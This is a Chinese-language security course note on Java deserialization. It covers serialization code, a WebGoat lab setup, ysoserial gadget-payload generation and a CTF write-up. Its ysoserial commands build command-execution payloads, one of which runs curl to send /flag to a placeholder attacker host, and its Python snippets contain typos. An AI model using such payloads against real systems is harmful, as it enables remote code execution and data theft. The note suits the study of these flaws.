【反序列化】---PHP&Java全解(下)---day38
一、思维导图
Java中API实现:
#序列化和反序列化
序列化(Serialization): 将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。
反序列化:从存储区中读取该数据,并将其还原为对象的过程,成为反序列化。
二、演示案例
1、Java反序列化及命令执行代码测试
反序列化:需要自己创建一下Person类
package SerialTest;
import java.io.*;
public class SerializableTest {
public static void main(String[] args) throws IOException, ClassNotFoundException {
serialPerson();
// Person person = deserialPerson();
// System.out.println(person);
}
public static void serialPerson() throws IOException{
Person person = new Person("xiaodi",28,"男",101);
ObjectOutputStream oos = new ObjectOutputStream(
new FileOutputStream(new File("C:\\Users\\darkerg\\Desktop\\person.txt"))
);
oos.writeObject(person);
System.out.println("person对象序列化成功!");
oos.close();
}
private static Person deserialPerson() throws IOException, ClassNotFoundException {
ObjectInputStream ois = new ObjectInputStream(
new FileInputStream(new File("C:\\Users\\darkerg\\Desktop\\person.txt"))
);
Person person = (Person) ois.readObject();
System.out.println("Person对象反序列化成功!");
return person;
}
}
命令执行:
import java.io.*;
public class Main {
public static void main(String[] args) throws InterruptedException, IOException {
Process p = Runtime.getRuntime().exec("ipconfig");
java.io.InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
p.waitFor();
if(p.exitValue()!=0){
//说明命令执行失败,可以进入到错误处理步骤中
}
String s = null;
while((s = reader.readLine())!=null){
System.out.println(s);
}
}
}
运行之后:
假设上面的ipconfig可以控制,并且是来自接受到反序列化后的数据,那么进行执行,就会形成命令执行漏洞。
2、WebGoat_Javaweb靶场反序列化测试
下载地址:
https://github.com/WebGoat/WebGoat/releases?after=test-v10
①安装:
下载完毕后:需要用jdk1.7环境下jar打开。
但是我已经安装了jdk1.8,不向下兼容。于是看到网上有用docker安装的,尝试一下。
拉取成功
运行环境:
docker run -p 8080:8080 -t webgoat/webgoat-8.0
虚拟机中打开:
宿主机中打开:
②演示:
③知识点补充:
例如:
要执行ipconfig
ipconfig => 序列化 -> base64 = rO0AB格式字符串 最终的payload
④ysoserial工具使用
https://blog.csdn.net/weixin_34275734/article/details/92243836
命令:
java -Dhibernate5 -cp hibernate-core-5.4.9.Final.jar;ysoserial-master.jar ysoserial.GeneratePayload Hibernate1 calc.exe >payload.bin
hibernate-core-5.4.9.Final.jar是WebGoat中的一个组件。
运行上面的命令,就可以得到一个payload,那么光得到payload是不行的,我们还要进行base64加密。
⑤base64加密脚本:
import base64
c=open("payload.bin","rb").read()
cc=base64.urlsafe_b64encode(c)
open("payload.txt","wt",ecoding="utf-8").wirte(cc.decode())
3、2020网鼎杯-think_java
靶场:CTFHub
下载附件,源代码,准备寻找突破口
有提示,目测是反序列化造成SQL注入的危害。
打开题目环境:
下面的POST
接口登录地址
回显
发现data中有开头为ro0A的字符串,序列化。然后上面有个身份认证token,把序列化的值放进去就可以,
返回值:
py2脚本base64解密数据
import base64
a = " "
b = base64.b64decode(a).encode('hex')
再利用SerializationDumper解析数据
下载地址
https://github.com/NickstaDB/SerializationDumper/releases/tag/1.13
java -jar SerializationDumper.jar #base64后的数据
解密后数据:
反序列化后数据:
查看用户信息,抓包:
请求数据包中有接受,我们就可以构造一个恶意的payload,发送出去。
java -jar ysoserial-master.jar ROME "curl http://xxx.xxx.xxx.xxx:4
444 -d @/flag" > darkerg.bin
使用ysoserial序列化构造payload
在服务器监听端口
